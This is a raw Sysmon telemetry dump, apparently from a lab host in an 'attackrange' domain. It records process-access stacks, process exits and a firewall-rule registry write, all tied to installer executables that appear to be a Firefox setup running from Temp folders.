13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 534500x800000000000000016649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe 10341000x800000000000000016648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 534500x800000000000000016644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe 10341000x800000000000000016643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 13241300x800000000000000016639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005e0) 13241300x800000000000000016638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{16EEDFF0-8258-4DDA-ADAA-88B2AFC2E471}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Program Files\Mozilla Firefox\firefox.exe|Name=Firefox (C:\Program Files\Mozilla Firefox)| 10341000x800000000000000016637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000016635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 